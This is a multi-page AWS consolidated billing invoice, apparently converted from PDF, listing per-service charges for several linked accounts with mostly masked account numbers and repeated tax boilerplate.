| **Amazon Elastic Compute Cloud** | **$511.92** |
| Charges | $511.92 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Simple Notification Service** | **$0.00** |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Route 53** | **$4.24** |
| Charges | $4.24 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421



## Summary for Linked Account

| Network Redux        8421) | $27.31 |
|---|---|
| Charges | $27.31 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account        8421 total allocated for this invoice | $27.31 |

## Detail for Linked Account

| Amazon Simple Storage Service | $0.88 |
|---|---|
| Charges | $0.88 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.01 |
| Charges | $0.01 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $2.27 |
| Charges | $2.27 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $14.59 |
| Charges | $14.59 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $9.56 |
| Charges | $9.56 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of
this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

18

Payer account number

_____ 8421



## Summary for Linked Account

| CryptoTrading Stage_____9884) | $1,595.52 |
|---|---|
| Charges | $1,595.52 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account_____ 9884 total allocated for this invoice | $1,595.52 |

## Detail for Linked Account

| Amazon Simple Storage Service | $0.16 |
|---|---|
| Charges | $0.16 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $6.28 |
| Charges | $6.28 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $507.59 |
| Charges | $507.59 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Email Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $3.31 |
| Charges | $3.31 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $669.84 |
| Charges | $669.84 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Backup | $0.23 |
| Charges | $0.23 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

19

Payer account number
[              ] 8421



| Amazon Simple Notification Service | $0.00 |
|---|---|
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Route 53** | **$0.10** |
| Charges | $0.10 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Elastic Container Service for Kubernetes** | **$144.00** |
| Charges | $144.00 |
| Estimated US sales tax to be collected | $0.00 |
| **AmazonCloudWatch** | **$203.22** |
| Charges | $203.22 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Elastic File System** | **$1.36** |
| Charges | $1.36 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon ElastiCache** | **$48.96** |
| Charges | $48.96 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS Key Management Service** | **$0.00** |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Simple Queue Service** | **$10.46** |
| Charges | $10.46 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of
this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

20

Payer account number
8421



## Summary for Linked Account

| Lunar Logic 5858) | $239.63 |
|---|---|
| Charges | $239.63 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Account 5858 total allocated for this invoice** | **$239.63** |

## Detail for Linked Account

| Amazon Simple Storage Service | $5.10 |
|---|---|
| Charges | $5.10 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $14.51 |
| Charges | $14.51 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $4.25 |
| Charges | $4.25 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $215.27 |
| Charges | $215.27 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $0.50 |
| Charges | $0.50 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

21

914-021

Payer account number

          8421



| Summary for Linked Account | |
|---|---|
| TradeIt Corp        9113) | $105.70 |
| Charges | $105.70 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account      9113 total allocated for this invoice | $105.70 |

| Detail for Linked Account | |
|---|---|
| Amazon Simple Storage Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $2.05 |
| Charges | $2.05 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.19 |
| Charges | $0.19 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $31.46 |
| Charges | $31.46 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Virtual Private Cloud | $71.90 |
| Charges | $71.90 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $0.10 |
| Charges | $0.10 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

22

Payer account number

[ ] 8421



## Summary for Linked Account

| NikeSB            1775) | $166.03 |
|---|---|
| Charges | $166.03 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account            1775 total allocated for this invoice | $166.03 |

## Detail for Linked Account

| Amazon Simple Storage Service | $0.00 |
|---|---|
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.21 |
| Charges | $0.21 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.69 |
| Charges | $0.69 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $0.04 |
| Charges | $0.04 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $59.93 |
| Charges | $59.93 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $104.16 |
| Charges | $104.16 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $1.00 |
| Charges | $1.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

23

914-023

Payer account number

_____ 8421



## Summary for Linked Account

| Adobe Spider Verse _____ 7848) | | $320.98 |
|---|---|---|
| | Charges | $320.98 |
| | Credits | $0.00 |
| | Estimated US sales tax to be collected | $0.00 |
| Account _____ 7848 total allocated for this invoice | | $320.98 |

## Detail for Linked Account

| Amazon Simple Storage Service | | $0.00 |
|---|---|---|
| | Charges | $0.00 |
| | Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | | $0.02 |
| | Charges | $0.02 |
| | Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | | $0.06 |
| | Charges | $0.06 |
| | Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | | $11.10 |
| | Charges | $11.10 |
| | Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | | $209.60 |
| | Charges | $209.60 |
| | Estimated US sales tax to be collected | $0.00 |
| Amazon CloudFront | | $0.33 |
| | Charges | $0.33 |
| | Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | | $99.35 |
| | Charges | $99.35 |
| | Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | | $0.00 |
| | Charges | $0.00 |
| | Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

24

Payer account number

8421



| AWS Backup | $0.01 |
|---|---|
| Charges | $0.01 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $0.50 |
| Charges | $0.50 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

25

914-025

Payer account number

8421



| Summary for Linked Account | |
|---|---|
| Owen Jones 8246) | $83.75 |
| Charges | $83.75 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account 8246 total allocated for this invoice | $83.75 |

| Detail for Linked Account | |
|---|---|
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Storage Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.08 |
| Charges | $0.08 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $15.11 |
| Charges | $15.11 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $67.54 |
| Charges | $67.54 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $1.02 |
| Charges | $1.02 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of
this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

26

914-026

Payer account number

_____ 8421



| Summary for Linked Account | |
| --- | --- |
| Redux Labs _____ 7303) | $432.85 |
| Charges | $432.85 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account        7303 total allocated for this invoice | $432.85 |

| Detail for Linked Account | |
| --- | --- |
| Amazon Simple Storage Service | $0.01 |
| Charges | $0.01 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $1.62 |
| Charges | $1.62 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $43.82 |
| Charges | $43.82 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Directory Service | $0.19 |
| Charges | $0.19 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon EC2 Container Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $227.13 |
| Charges | $227.13 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon EC2 Container Registry (ECR) | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

914-027

Payer account number

░░░░░8421



| Amazon Route 53 | $0.21 |
|---|---|
| Charges | $0.21 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Container Service for Kubernetes | $144.00 |
| Charges | $144.00 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $5.54 |
| Charges | $5.54 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon ElastiCache | $10.34 |
| Charges | $10.34 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

28

914-028

Payer account number

_____ 8421



## Summary for Linked Account

| Redux Bastion _____ 4135) | $7.34 |
|---|---|
| Charges | $7.34 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account _____ 4135 total allocated for this invoice | $7.34 |

## Detail for Linked Account

| Amazon Simple Storage Service | $0.13 |
|---|---|
| Charges | $0.13 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $0.12 |
| Charges | $0.12 |
| Estimated US sales tax to be collected | $0.00 |
| AWS CloudTrail | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $5.09 |
| Charges | $5.09 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $0.99 |
| Charges | $0.99 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $1.00 |
| Charges | $1.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of
this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

29

Payer account number

8421



| Amazon Simple Notification Service | $0.00 |
|---|---|
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

30

914–030

Payer account number

_____ 8421



| Summary for Linked Account | |
|---|---|
| CryptoTrading QA (_____ 7608) | $1,409.84 |
| Charges | $1,409.84 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account _____ 7608 total allocated for this invoice | $1,409.84 |

| Detail for Linked Account | |
|---|---|
| Amazon GuardDuty | $21.89 |
| Charges | $21.89 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Storage Service | $1.19 |
| Charges | $1.19 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $5.97 |
| Charges | $5.97 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Email Service | $0.01 |
| Charges | $0.01 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $107.43 |
| Charges | $107.43 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $825.26 |
| Charges | $825.26 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $8.63 |
| Charges | $8.63 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

31

Payer account number
**8421**



| Amazon EC2 Container Registry (ECR) | $0.02 |
|---|---|
| Charges | $0.02 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS Backup** | **$0.49** |
| Charges | $0.49 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS Config** | **$6.29** |
| Charges | $6.29 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Simple Notification Service** | **$0.03** |
| Charges | $0.03 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Elastic Container Service for Kubernetes** | **$144.00** |
| Charges | $144.00 |
| Estimated US sales tax to be collected | $0.00 |
| **AmazonCloudWatch** | **$227.45** |
| Charges | $227.45 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Elastic File System** | **$2.96** |
| Charges | $2.96 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS CloudTrail** | **$0.78** |
| Charges | $0.78 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon ElastiCache** | **$48.96** |
| Charges | $48.96 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS Key Management Service** | **$1.00** |
| Charges | $1.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Simple Queue Service** | **$7.49** |
| Charges | $7.49 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

914-032

Payer account number
⬛⬛⬛⬛⬛ 8421



| Summary for Linked Account | |
|---|---|
| Crypto Trading Dev ⬛⬛⬛ 8935) | $0.00 |
| Charges | $0.00 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account ⬛⬛⬛ 8935 total allocated for this invoice | $0.00 |

| Detail for Linked Account | |
|---|---|
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

33

Payer account number



## Summary for Linked Account

| Adobe Hidden Treasures (            5524) | $107.47 |
|---|---|
| Charges | $107.47 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account            5524 total allocated for this invoice | $107.47 |

## Detail for Linked Account

| Amazon Simple Storage Service | $0.00 |
|---|---|
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Lambda | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $0.03 |
| Charges | $0.03 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $4.17 |
| Charges | $4.17 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic File System | $0.02 |
| Charges | $0.02 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon CloudFront | $3.38 |
| Charges | $3.38 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $99.35 |
| Charges | $99.35 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
429466558421



| AWS Backup | $0.00 |
|---|---|
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Route 53 | $0.51 |
| Charges | $0.51 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

35

Payer account number

8421



## Summary for Linked Account

| Mystic Logistics (3887) | $307.27 |
| --- | --- |
| Charges | $307.27 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Account          3887 total allocated for this invoice** | **$307.27** |

## Detail for Linked Account

| Amazon Simple Storage Service | $0.18 |
| --- | --- |
| Charges | $0.18 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS Data Transfer** | **$0.01** |
| Charges | $0.01 |
| Estimated US sales tax to be collected | $0.00 |
| **AmazonCloudWatch** | **$4.84** |
| Charges | $4.84 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS CloudTrail** | **$0.00** |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Elastic Compute Cloud** | **$291.25** |
| Charges | $291.25 |
| Estimated US sales tax to be collected | $0.00 |
| **AWS Key Management Service** | **$11.00** |
| Charges | $11.00 |
| Estimated US sales tax to be collected | $0.00 |
| **Amazon Simple Notification Service** | **$0.00** |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

36

Payer account number

8421



## Summary for Linked Account

| TradeIt QA        5523) | $822.95 |
|---|---|
| Charges | $822.95 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account          5523 total allocated for this invoice | $822.95 |

## Detail for Linked Account

| Amazon GuardDuty | $7.86 |
|---|---|
| Charges | $7.86 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Storage Service | $1.00 |
| Charges | $1.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $1.15 |
| Charges | $1.15 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Container Service for Kubernetes | $144.00 |
| Charges | $144.00 |
| Estimated US sales tax to be collected | $0.00 |
| AmazonCloudWatch | $38.61 |
| Charges | $38.61 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $65.27 |
| Charges | $65.27 |
| Estimated US sales tax to be collected | $0.00 |
| AWS CloudTrail | $0.02 |
| Charges | $0.02 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon ElastiCache | $48.96 |
| Charges | $48.96 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

Payer account number
8421



| Amazon Elastic Compute Cloud | $513.24 |
|---|---|
| Charges | $513.24 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Key Management Service | $1.00 |
| Charges | $1.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Config | $1.85 |
| Charges | $1.85 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Notification Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
AWS, Inc. is a "Registered Foreign Supplier" under Japanese Consumption Tax Law and therefore AWS, Inc. is required to declare and pay consumption tax in respect of this transaction (as a "Digital Service") to the Japan Tax Authority.
** This is not a VAT or GST invoice
**** Please reference the tax invoice for a breakout of the Canadian taxes by type

38

Payer account number
_____ 8421



## Summary for Linked Account

| CryptoTrading Prod _____ 6117) | $2,994.65 |
|---|---|
| Charges | $2,994.65 |
| Credits | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Account          6117 total allocated for this invoice | $2,994.65 |

## Detail for Linked Account

| AWS Lambda | $0.00 |
|---|---|
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Storage Service | $6.52 |
| Charges | $6.52 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Data Transfer | $17.51 |
| Charges | $17.51 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Relational Database Service | $502.24 |
| Charges | $502.24 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Simple Email Service | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| AWS Secrets Manager | $0.00 |
| Charges | $0.00 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon Elastic Compute Cloud | $1,597.12 |
| Charges | $1,597.12 |
| Estimated US sales tax to be collected | $0.00 |
| Amazon DynamoDB | $1.65 |
| Charges | $1.65 |
| Estimated US sales tax to be collected | $0.00 |

For line item details, please visit the Account Activity Page aws.amazon.com
* May include estimated US sales tax, VAT, GST and CT.
Amazon Web Services, Inc. foreign registration number is 00004
